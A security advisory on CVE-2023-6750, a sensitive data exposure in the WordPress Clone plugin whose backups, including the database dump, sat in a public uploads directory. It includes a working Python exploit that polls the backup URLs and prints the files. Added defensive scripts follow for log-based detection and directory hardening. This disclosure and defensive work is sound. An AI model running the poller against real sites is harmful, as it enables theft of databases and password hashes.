A critical vulnerability has been identified in the Clone plugin during testing, specifically within the directory /wordpress/wp-content/uploads/wp-clone/wpclone_backup. This flaw exposes comprehensive information about the site, encompassing its configuration, directories, and files. Most crucially, it grants unauthorized access to sensitive data within the database and all associated content. Exploiting this vulnerability introduces an imminent threat, potentially leading to brute force attacks on password hashes and, consequently, the compromise of the entire system.
Main info:

| CVE | CVE-2023-6750 |
| Plugin | Clone < 2.4.3 |
| Critical | Super High |
| All Time | 3 152 883 |
| Active installations | 90 000+ |
| Publicly Published | December 19, 2023 |
| Last Updated | December 19, 2023 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | Yes |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6750, https://wpscan.com/vulnerability/fad9eefe-4552-4d20-a1fd-bb2e172ec8d7/ |
| Plugin Security Certification by CleanTalk | |
Timeline

| December 11, 2023 | Plugin testing and vulnerability detection in the Clone plugin have been completed |
| December 11, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 15, 2023 | The author fixed the vulnerability and released the plugin update |
| December 19, 2023 | Registered CVE-2023-6750 |
Discovery of the Vulnerability
A severe vulnerability has been discovered in the directory /wordpress/wp-content/uploads/wp-clone/wpclone_backup. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.
Understanding Sensitive Data Exposure attacks
Sensitive Data Exposure in WordPress refers to the unintentional exposure of critical information, such as database details, passwords, or other confidential data. Real-world examples highlight the risks associated with unauthorized access to sensitive files and databases, often leading to compromised user accounts, manipulation of data, and the potential for a complete system takeover.
Exploiting the Sensitive Data Exposure Vulnerability
Exploiting this vulnerability involves accessing the exposed directory /wordpress/wp-content/uploads/wp-clone/wpclone_backup to retrieve sensitive information, including database contents and associated files. Attackers could leverage this unauthorized access to launch brute force attacks on password hashes, escalating their control over the compromised system.
POC:
1) The plugin has the ability to back up files and the DB. When the admin starts a backup, it is possible to steal the data. I will do it manually, but this is similar to automatic scanning.
2) There is a lot of sensitive data and, most importantly, you can download a backup file to your local machine:
"http://your_site/wordpress/wp-content/uploads/wp-clone/wpclone_backup/file.list",
"http://your_site/wordpress/wp-content/uploads/wp-clone/wpclone_backup/database.sql",
"http://your_site/wordpress/wp-content/uploads/wp-clone/wpclone_backup/prefix.txt"
EXPLOIT (python3):
import requests
import time
import threading

# The three backup artifacts the plugin writes into the public uploads directory.
urls = [
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-clone/wpclone_backup/file.list",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-clone/wpclone_backup/database.sql",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-clone/wpclone_backup/prefix.txt",
]

print("The following links are checked:")
for url in urls:
    print(url)


def check_url(url):
    # Poll one URL every 0.7 s and print its body once the server answers 200
    # (i.e. as soon as the admin-triggered backup has been written).
    while True:
        try:
            response = requests.get(url)
            if response.status_code == 200:
                print(f"File at {url} found! I display the contents...")
                print(response.text)
        except requests.RequestException as e:
            print(f"Error when requesting to {url}: {e}")
        time.sleep(0.7)


# One polling thread per artifact.
for url in urls:
    thread = threading.Thread(target=check_url, args=(url,))
    thread.start()
___
The potential risk of this vulnerability is severe, encompassing unauthorized access to sensitive data, potential data manipulation, and the compromise of the entire system. In real-world scenarios, attackers could exploit this exposure to gain access to critical configuration details, user credentials, and other confidential data. Subsequent brute force attacks on password hashes could lead to account takeovers, further jeopardizing the security and integrity of the WordPress site.
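From the defender's side, the exploit above leaves a recognisable trace: one client repeatedly requesting the same three paths under wpclone_backup, first getting 404s and then a 200 with a large response body. The following detection script is an added example written for this advisory, not code from the page's author or from the Clone plugin. It parses web-server access logs in the common "combined" format; the log lines are constructed samples, and the IP addresses, timestamps and the polling threshold of three requests are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (not real traffic) in "combined" format,
# mimicking the polling pattern of the PoC: 404s until the backup lands, then 200.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Dec/2023:10:00:01 +0000] "GET /wordpress/wp-content/uploads/wp-clone/wpclone_backup/database.sql HTTP/1.1" 404 196 "-" "python-requests/2.31.0"
203.0.113.5 - - [11/Dec/2023:10:00:02 +0000] "GET /wordpress/wp-content/uploads/wp-clone/wpclone_backup/file.list HTTP/1.1" 404 196 "-" "python-requests/2.31.0"
203.0.113.5 - - [11/Dec/2023:10:00:02 +0000] "GET /wordpress/wp-content/uploads/wp-clone/wpclone_backup/prefix.txt HTTP/1.1" 404 196 "-" "python-requests/2.31.0"
198.51.100.7 - - [11/Dec/2023:10:00:05 +0000] "GET /wordpress/wp-content/uploads/2023/12/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Dec/2023:10:00:09 +0000] "GET /wordpress/wp-content/uploads/wp-clone/wpclone_backup/database.sql HTTP/1.1" 200 4823190 "-" "python-requests/2.31.0"
203.0.113.5 - - [11/Dec/2023:10:00:10 +0000] "GET /wordpress/wp-content/uploads/wp-clone/wpclone_backup/prefix.txt HTTP/1.1" 200 4 "-" "python-requests/2.31.0"
"""

# Apache/nginx "combined" log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"'
)

# Directory named in the advisory; the site may live under any prefix, so match as a substring.
BACKUP_DIR = "/wp-content/uploads/wp-clone/wpclone_backup/"
# Assumed threshold: this many requests to the backup directory from one IP is treated as polling.
POLL_THRESHOLD = 3


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def analyse(log_text):
    """Find successful downloads of backup artifacts and clients polling for them."""
    exposures = []                  # 200 responses: data actually left the server
    hits_per_ip = defaultdict(int)  # every request to the backup dir, any status
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or BACKUP_DIR not in rec["path"]:
            continue
        hits_per_ip[rec["ip"]] += 1
        if rec["status"] == 200:
            exposures.append({"ip": rec["ip"], "ts": rec["ts"],
                              "path": rec["path"], "bytes": rec["size"]})
    pollers = {ip: n for ip, n in hits_per_ip.items() if n >= POLL_THRESHOLD}
    return {"exposures": exposures, "pollers": pollers}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for e in result["exposures"]:
        print(f"EXPOSED {e['path']} -> {e['ip']} ({e['bytes']} bytes) at {e['ts']}")
    for ip, n in result["pollers"].items():
        print(f"POLLING {ip}: {n} requests to the backup directory")
```

A 200 on database.sql is the incident signal (the dump has been downloaded and the password hashes with it); the polling count is the early-warning signal, since the requests that precede a successful download are 404s that a status-code-only alert would ignore.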
Recommendations for Improved Security
- Directory Security Measures: Implement robust security measures for directories, incorporating access controls, regular audits, and encryption to prevent unauthorized access.
- Access Control: Configure stringent access controls to restrict sensitive data access only to authorized personnel.
- Plugin Update: Regularly update the Clone plugin with the latest security patches to address this vulnerability.
- Password Policy: Enforce strong password policies to mitigate the risk of brute force attacks.
- Security Audits: Conduct regular security audits to identify and rectify potential vulnerabilities within the WordPress environment.
Implementing these security measures will significantly reduce the risk of unauthorized access to sensitive data through the Sensitive Data Exposure vulnerability in the Clone plugin.
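The first two recommendations ("Directory Security Measures" and "Access Control") can be checked and applied with a small audit script. The following is an added example for this advisory, not code from the page's author or from the Clone plugin: it walks an uploads tree, reports any directory holding backup artifacts (the three file names from the advisory, plus assumed archive suffixes) that is not covered by an Apache deny rule, and then writes a deny .htaccess, an index.php stub and tighter file permissions into each such directory. The temporary fixture it builds is constructed for the demonstration and is not a real site.

```python
import os
import tempfile

# File names the advisory lists as exposed, plus archive suffixes a backup job
# commonly writes (the suffix list is an assumption, extend it for your plugin).
BACKUP_MARKERS = ("database.sql", "file.list", "prefix.txt")
BACKUP_SUFFIXES = (".sql", ".zip", ".tar", ".gz")

# Deny rule in both Apache 2.4 (mod_authz_core) and Apache 2.2 syntax.
HTACCESS_DENY = """# Deny direct web access to backup artifacts
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>
"""
INDEX_STUB = "<?php // Silence is golden.\n"


def is_backup_artifact(name):
    return name in BACKUP_MARKERS or name.lower().endswith(BACKUP_SUFFIXES)


def directory_is_protected(path):
    """True if the directory has an .htaccess that denies all web access."""
    ht = os.path.join(path, ".htaccess")
    if not os.path.isfile(ht):
        return False
    with open(ht) as f:
        text = f.read()
    return "Require all denied" in text or "Deny from all" in text


def audit_uploads(uploads_root):
    """Return (relative dir, [artifacts]) for every unprotected backup directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(uploads_root):
        artifacts = sorted(f for f in files if is_backup_artifact(f))
        if artifacts and not directory_is_protected(dirpath):
            findings.append((os.path.relpath(dirpath, uploads_root), artifacts))
    return findings


def harden_directory(path):
    """Write the deny rule and an index stub, and make artifacts owner-only."""
    with open(os.path.join(path, ".htaccess"), "w") as f:
        f.write(HTACCESS_DENY)
    idx = os.path.join(path, "index.php")
    if not os.path.exists(idx):
        with open(idx, "w") as f:
            f.write(INDEX_STUB)
    for name in os.listdir(path):
        if is_backup_artifact(name):
            os.chmod(os.path.join(path, name), 0o600)


def remediate(uploads_root):
    """Harden every directory the audit flags; return the directories fixed."""
    fixed = []
    for rel, _artifacts in audit_uploads(uploads_root):
        harden_directory(os.path.join(uploads_root, rel))
        fixed.append(rel)
    return fixed


def build_sample_uploads():
    """Constructed fixture mirroring the advisory's layout (not a real site)."""
    root = tempfile.mkdtemp(prefix="uploads-")
    backup = os.path.join(root, "wp-clone", "wpclone_backup")
    os.makedirs(backup)
    for name in BACKUP_MARKERS:
        with open(os.path.join(backup, name), "w") as f:
            f.write("constructed sample content\n")
    media = os.path.join(root, "2023", "12")
    os.makedirs(media)
    open(os.path.join(media, "logo.png"), "wb").close()
    return root


if __name__ == "__main__":
    root = build_sample_uploads()
    print("before:", audit_uploads(root))
    print("fixed:", remediate(root))
    print("after:", audit_uploads(root))
```

Two caveats a practitioner should keep in mind: an .htaccess rule only takes effect when Apache is configured with AllowOverride for that path, and nginx ignores .htaccess entirely, so there the equivalent is a location block for the backup directory that returns 403 or denies all. The more robust design, and the one that makes the deny rule a second line of defence rather than the only one, is to keep backups outside the web root altogether or under a directory name that cannot be guessed.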
DMITRII I.